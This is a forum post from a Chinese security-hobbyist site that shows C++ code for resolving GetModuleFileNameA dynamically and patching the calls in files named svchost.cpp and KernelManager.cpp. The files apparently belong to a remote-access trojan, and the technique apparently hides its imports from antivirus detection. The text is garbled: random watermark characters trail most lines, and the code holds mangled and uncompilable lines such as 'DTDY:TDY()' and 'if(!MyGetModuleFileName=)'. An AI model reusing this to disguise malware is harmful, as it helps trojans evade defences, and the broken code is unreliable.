Board logo

标题: [原创文章] 全局动态调用 [打印本页]
作者: ice_xke    时间: 2010-10-19 12:30     标题: 全局动态调用

全局动态调用笔记% ^* _- S) N- u; ^* e3 z, b1 [6 Y( C
svchost files工程->插入->类(Generic Class DTDY)->DTDY.cpp DTDY.h* P% S4 e" V0 p4 I
----------------------------------------) R. a: L% m% C" F( |
DTDY.h:
% o" G" P, T1 {4 f5 }9 ?
6 }1 q- K# k! v7 R+ m- z#if _MSC_VER>1000+ O% `5 a8 U. R) q* |" q, u$ G
#pragma once
) A! J- e$ H  Z3 N#endif //_MSC_VER>1000
! j, x1 e0 O0 d- a- _/ u8 |#include<windows.h>/ t1 e5 h1 V3 l! [% ?

' c% V. x6 e, F. Ktypedef DWORD (__stdcall *pGetModuleFileNameA)(HMODULE,LPSTR,DWORD);
' A1 B+ l( H/ T" f" |class DTDY8 B: T( R7 ?1 r1 @
{
# T- U' a. y) ]public:, t: V! T- w% V0 K! Z' D+ K) h
DTDY();
. h. U: S% \$ wvirtual ~DTDY();
7 G+ A7 i- B" \) l, T9 Spublic:
' K8 j: Z! I7 j! B0 bstatic pGetModuleFileNameA MyGetModuleFileName;3 t' H6 \1 \( [0 v8 T& Z6 T+ X
static BOOL FunInitiallization();
3 d9 |/ R7 T% v* L};5 a8 G% y7 g& T) v3 c( P
#endif
6 s- A3 h6 Z& x5 [' a  X----------------------------------------7 N% s9 N2 D- f) u4 Y# Z
3 c9 K! j6 D3 E% y) A2 j. S8 j5 s
DTDY.cpp:% r  s& F. \7 L3 M0 P

0 t. ?* f# d7 g4 k#include "DTDY.h"
& s6 j" S8 g: w) opGetModuleFileNameA DTDY::MyGetModuleFileName=NULL;/ y7 J3 J& @: l) V, M/ B1 F
DTDY:TDY()2 f" n. z8 W6 J. k4 m% q
{
: |5 |2 @/ p" Z& {" ]7 @9 U" [) i}6 ~; U2 V( W0 Y$ d  j% ]
DTDY::~DTDY()
% ^. u; ]" p' X{  \" s& E2 X- i% E0 j* K
}' H, E8 i4 @  A+ s; p! t& V
BOOL DTDY::FunInitiallization()
; U, z5 F' h# h/ I{
* Q# ^( y. s. d5 EHMODULE hModule=LoadLibrary("kernel32.dll");
: c3 ~* _. V% {1 F- ZMyGetModuleFileName=(pGetModuleFileNameA)GetProcAddress(hModule,"GetModuleFileNameA");
, X$ }$ S) R( K) pif(!MyGetModuleFileName=) return FALSE;$ q$ D* y7 F0 j: v6 I% F; |

: b! K) w+ {# r; c. w* E3 C7 F! zreturn TRUE;' f( f, @2 l& C3 A
}9 g3 x8 @: H" {# }! s
----------------------------------------
$ |3 f. f2 R4 Y$ f/ s2 m8 asvchost.cpp:
2 t! g) z- i" p/ E, k; x. H" K/ q" j3 a* Y8 z( X
#include "DTDY.h"
4 W: X6 @9 U% }7 ]5 ~" A
' l6 ~) Z. r6 pBOOL APIENTRY DllMain(HANDLE hModule,DWORD ul_reason_for_call,LPVOID lpReserved)
) o8 @% [  h/ G! D{$ l2 C2 R9 }$ g! S  B+ V
switch(ul_reason_for_call)
% d8 b& l# c/ g; c* y! q/ j{$ @9 p3 y6 q7 y1 ]& ?/ J7 f
case DLL_PROCESS_ATTACH:8 r4 I% k* A( s1 j3 z
if(!DTDY::FunInitiallization()) return FALSE;6 v  b; h/ [) @+ Z3 V
) m9 r) H+ |+ o1 T/ B* J* s! e
break;
. m0 M. R; T1 N1 M( y* Y- ]5 v}
4 Z8 o% U) O' O5 V- U" a& ?, X}
" `) y, k3 `) o* D+ T& R, c# Y- m9 {
7 H# C1 A3 J$ w
GetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));->goto def9 O( |2 t: B' w
改写为
% Q8 ?( g) q* M1 Y- DDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strFileName,sizeof(strFileName));
4 ~9 B- H- F4 Q7 g, m----------------------------------------
+ R! y* w3 i' A; i. Z' HKernelManager.cpp:
2 {- d+ O9 F+ S' L4 _4 D& a3 L9 P' r8 r' V2 j: D& M+ _
#include "../DTDY.h"7 _9 S) x4 k, @: }, q% e
GetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
, Q: v1 C! q3 v7 K8 ~; ]改写为
4 l+ Z' J) Y) v% lDTDY::MyGetModuleFileName(CKeyboardManager::g_hInstance,strServiceDll,sizeof(strServiceDll));
3 o1 G" p0 R( k6 ?/ L7 `) O/ u----------------------------------------



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2